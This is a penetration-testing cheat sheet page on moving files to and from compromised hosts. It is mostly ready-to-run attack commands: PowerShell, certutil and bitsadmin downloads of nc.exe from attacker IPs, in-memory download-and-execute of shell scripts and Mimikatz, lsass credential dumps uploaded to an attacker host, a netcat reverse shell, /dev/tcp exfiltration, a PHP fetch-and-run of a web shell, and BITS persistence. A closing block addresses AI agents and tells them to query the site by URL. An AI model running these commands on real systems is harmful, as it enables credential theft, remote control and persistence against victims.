# File Transfer

## **Basic commands**

```
python -m SimpleHTTPServer 80
php -S 0.0.0.0:80

powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.17/nc.exe','c:\temp\nc.exe')
powershell.exe -c (Start-BitsTransfer -Source "http://10.10.14.17/nc.exe -Destination C:\temp\nc.exe")
powershell.exe wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe"
certutil.exe -urlcache -split -f "http://10.10.14.17/nc.exe" c:\temp\nc.exe
bitsadmin /transfer job /download /priority high http://10.10.14.17/nc.exe c:\temp\nc.exe
powershell -c "Invoke-WebRequest -Uri http://10.10.15.150/41020.exe -OutFile C:\Users\kostas\Desktop\41020.exe"	
powershell Invoke-WebRequest http://10.10.14.10/nc.exe -OutFile nc.exe
powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://ip/script.ps1')
powershell -exec bypass -command "IEX (New-Object System.Net.WebClient).DownloadString('http://$PENTEST_BOX_IP/Invoke-Mimikatz.ps1');Invoke-Mimikatz"
```

### execute ps1 files

```
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File jaws.ps1
powershell.exe -ExecutionPolicy Bypass -File jaws.ps1
```

### load it into the memory

```
IEX(New-Object Net.WebClient).downloadString('http://10.10.15.189:9999/jaws-enum.ps1')
powershell iex(new-object net.webclient).downloadstring(\"http://10.10.14.14/shell.ps1\")
powershell IEX(New-Object Net.WebClient).downloadstring(\"http://10.10.14.14/shell.ps1\")
```

### ninja1

```
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.15.189:9999/jaws-enum.ps1" >>wget.ps1
echo $file = "jaws.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
```

### SMB

```
python3 /usr/share/doc/python3-impacket/examples/smbserver.py a . -smb2support
net view \\10.10.14.17
copy \\10.10.14.17\a\nc.exe .
copy nc2.exe \\10.10.14.17\a\nc2.exe
```

### SMB with password + lsass dump

```
python3 /usr/share/doc/python3-impacket/examples/smbserver.py a . -smb2support -debug -comment "use it" -username admin -password 123 -ts
C:\>net use s: \\10.201.69.16\a /user:admin 123
S:\>procdump.exe -ma lsass.exe c:\TEMP\a.txt
copy c:\TEMPa.txt.dmp s:
```

### Execute nc via SMB (bypass defenses)

```
\\10.10.14.17\SHARE\nc.exe -nv 10.10.14.17 4444 -e cmd.exe
```

### netcat

```
ncat -lvp 80 > nc2.exe
nc -nv 10.10.14.17 < nc.exe -w 15
```

### copy files from target to kali

```
.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 608 C:\temp\lsass.dmp full
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile(\"http://10.9.4.210:9999/\", \"lsass.dmp\")
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile('http://10.92.137.181:8888', 'zzzzzz.txt.dmp')

nc -lvp 9999 > lsasss.dmp
```

### with PHP

```
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
```

### HTTP-POST

```
http-post.py
./curl -F 'file=@firefox.exe_190824_231811.dmp' 10.10.15.213:8000/ -v
```

### /dev/tcp

```
cat xxx.zip > /dev/tcp/10.x.x.x.x/9001
nc -lvp 9001 > xxx.zip
```

### fetch (OpenBSD)

```
fetch  http://10.11.0.244/exploit.c
<?php system("fetch -o /usr/local/databases/shell.php http://10.11.0.244/shell.php; php /usr/local/databases/shell.php"); ?>
```

### rdesktop or remmina

```
rdesktop -r disk:tmp=/home/user/Desktop <remote ip address>
```

## BITS

Download file into the C:\Windows folder.

```
> bitsadmin /create download
> bitsadmin /addfile download https://<site>/malware.exe c:\windows\malware.exe
> bitsadmin /resume download
> bitsadmin /complete download

Created job {EA8603EB-7CC2-44EC-B1EE-E9923290C2ED}.
Added https://<site>/malware.exe -> c:\windows\malware.exe to job.
Job resumed.
Job completed.
```

Create persistence.

```
> bitsadmin /create persistence
> bitsadmin /addfile persistence http://127.0.0.1/invalid.exe c:\windows\i.exe
> bitsadmin /SetNotifyCmdLine persistence c:\windows\malware.exe NULL
> bitsadmin /resume persistence
```

![](/files/-MYqkGCp7A_oVAXvDXIH)

{% embed url="<https://www.fireeye.com/blog/threat-research/2021/03/attacker-use-of-windows-background-intelligent-transfer-service.html>" %}

## ​[**updog**](https://github.com/sc0tfree/updog)

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth.<br>

![](/files/-MYqoFkHp1TE8iZhV4gh)

or simply:

```
python -m SimpleHTTPServer 8080
```

or HTTPS with upload :sunglasses:&#x20;

{% embed url="<https://github.com/rhmoult/SecurityTools/blob/master/Platform_Independent/Python/httpsWithUpload/src/httpsWithUpload.py>" %}

## References

{% embed url="<https://isroot.nl/2018/07/09/post-exploitation-file-transfers-on-windows-the-manual-way/>" %}

{% embed url="<https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-download-a-file/>" %}

{% embed url="<https://blog.ropnop.com/transferring-files-from-kali-to-windows/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gitbook.seguranca-informatica.pt/cheat-sheet-1/stuff/file-transfer.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.